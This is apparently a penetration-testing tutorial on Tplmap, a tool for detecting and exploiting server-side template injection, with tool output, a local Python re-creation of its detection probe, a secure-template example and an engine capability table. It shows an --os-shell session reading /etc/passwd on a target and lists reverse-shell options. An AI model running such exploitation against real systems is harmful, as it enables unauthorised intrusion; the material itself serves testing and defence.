When you are penetration-testing a web application that builds dynamic content from templates containing user-supplied values, you may run into a server-side template injection (SSTI) vulnerability. Identifying the template engine in use and then exploiting it by hand is tedious; the Tplmap tool automates both steps.
Tplmap can detect and exploit SSTI in several types of template engine. Once an injection point is confirmed, it can browse the file system of the attacked server and execute commands on it remotely.
```
$ ./tplmap.py -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Rerun tplmap providing one of the following options:

    --os-shell                   Run shell on the target
    --os-cmd                     Execute shell commands
    --bind-shell PORT            Connect to a shell bind to a target port
    --reverse-shell HOST PORT    Send a shell back to the attacker's port
    --upload LOCAL REMOTE        Upload files to the server
    --download REMOTE LOCAL      Download remote files
```
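The log above shows the "render" technique in action: each plugin wraps an arithmetic expression in its engine's tag and checks whether the response contains the computed result. The following is an added example that re-creates that detection logic; it is not Tplmap's own code. It assumes a `send(value)` callback that returns the response body for the tested parameter set to `value` (an HTTP client in a real test), and it runs against constructed mock endpoints in which regexes stand in for the real engines, so it needs no network and no template library. The `fixed_page` endpoint shows the pattern that makes the probe fail: the user value is passed as template context, never concatenated into template source.

```python
"""Re-creation of Tplmap's 'render' detection technique (added example).

The mock endpoints below are constructed for this example; their regexes only
simulate the '{{ a*b }}' / '${ a*b }' arithmetic a real engine would evaluate.
"""
import html
import random
import re
from typing import Callable, Optional

# Probe tags modelled on the ones Tplmap's plugins report ('{{*}}', '${*}', ...).
# '*' marks where the expression goes. Several engines share syntax, so a hit
# only narrows the candidates; Tplmap follows up with engine-specific payloads
# (not shown here) to pin down the exact engine.
PROBES = [
    ("{{*}}", "Jinja2 / Twig / Nunjucks"),
    ("${*}", "Mako / Freemarker / Velocity"),
    ("{*}", "Smarty"),
    ("<%=*%>", "ERB / EJS"),
]


def detect_ssti(send: Callable[[str], str],
                rng: Optional[random.Random] = None) -> Optional[dict]:
    """Return the first probe tag whose arithmetic is evaluated by the target.

    `send` is an assumed hypothetical callback: it submits one value for the
    tested parameter and returns the response body.
    """
    rng = rng or random.Random()
    for tag, engines in PROBES:
        a, b = rng.randint(1000, 9999), rng.randint(1000, 9999)
        expected = str(a * b)            # 7-8 digits: unlikely to occur by chance
        payload = tag.replace("*", f"{a}*{b}")
        body = send(payload)
        # Evaluated: the product appears and the raw payload does not.
        # Input that is merely reflected (XSS territory, not SSTI) keeps the
        # raw payload in the body and fails this check.
        if expected in body and payload not in body:
            return {"tag": tag, "engines": engines, "technique": "render"}
    return None


# --- constructed mock endpoints ---------------------------------------------

_JINJA_MATH = re.compile(r"\{\{\s*(\d+)\*(\d+)\s*\}\}")
_MAKO_MATH = re.compile(r"\$\{\s*(\d+)\*(\d+)\s*\}")


def vulnerable_jinja_page(name: str) -> str:
    """Simulates render_template_string("Hello " + name): the user value
    becomes template source, so '{{ 1234*5678 }}' gets evaluated."""
    template = "Hello " + name
    return _JINJA_MATH.sub(lambda m: str(int(m[1]) * int(m[2])), template)


def vulnerable_mako_page(name: str) -> str:
    """The same mistake with Mako-style '${...}' syntax."""
    template = "Hello " + name
    return _MAKO_MATH.sub(lambda m: str(int(m[1]) * int(m[2])), template)


def fixed_page(name: str) -> str:
    """Correct pattern: a fixed template plus the user value as context.
    The value is substituted into the output (escaped) and is never parsed
    as template source, so every probe comes back uninterpreted."""
    template = "Hello {{ name }}"
    context = {"name": name}
    return re.sub(r"\{\{\s*(\w+)\s*\}\}",
                  lambda m: html.escape(str(context.get(m[1], ""))),
                  template)


if __name__ == "__main__":
    for label, endpoint in [("vulnerable jinja", vulnerable_jinja_page),
                            ("vulnerable mako", vulnerable_mako_page),
                            ("fixed", fixed_page)]:
        print(label, "->", detect_ssti(endpoint, random.Random(1)))
```

The check `expected in body and payload not in body` is what separates SSTI from plain reflection: a page that echoes `{{1234*5678}}` back verbatim is not injectable at the template layer, even though it may be worth a separate XSS test. Tplmap's blind technique covers the remaining case, where the page evaluates the expression but never shows the result, by measuring time delays instead of output.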
Rerun Tplmap with the --os-shell option to get a pseudo-terminal on the target:
```
$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Run commands on the operating system.
linux $ whoami
Web
linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
```
Tplmap supports more than 15 template engines. Note the bottom three rows: the sandboxed configurations of Twig, Smarty and Dust are not exploitable by the tool, so a "secured" engine version is the defence the table is telling you about.

Engine | Remote command execution | Blind | Code evaluation | File read | File write |
---|---|---|---|---|---|
Mako | ✓ | ✓ | Python | ✓ | ✓ |
Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |
Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |
Tornado | ✓ | ✓ | Python | ✓ | ✓ |
Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |
Pug | ✓ | ✓ | JavaScript | ✓ | ✓ |
doT | ✓ | ✓ | JavaScript | ✓ | ✓ |
Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |
JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |
Dust (<= dustjs-helpers@1.5.0) | ✓ | ✓ | JavaScript | ✓ | ✓ |
EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |
Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |
Slim | ✓ | ✓ | Ruby | ✓ | ✓ |
ERB | ✓ | ✓ | Ruby | ✓ | ✓ |
Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |
PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |
Twig (<=1.19) | ✓ | ✓ | PHP | ✓ | ✓ |
Freemarker | ✓ | ✓ | × | ✓ | ✓ |
Velocity | ✓ | ✓ | × | ✓ | ✓ |
Twig (>1.19) | × | × | × | × | × |
Smarty (secured) | × | × | × | × | × |
Dust (> dustjs-helpers@1.5.0) | × | × | × | × | × |
Tplmap is available on its creator's GitHub: https://github.com/epinna/tplmap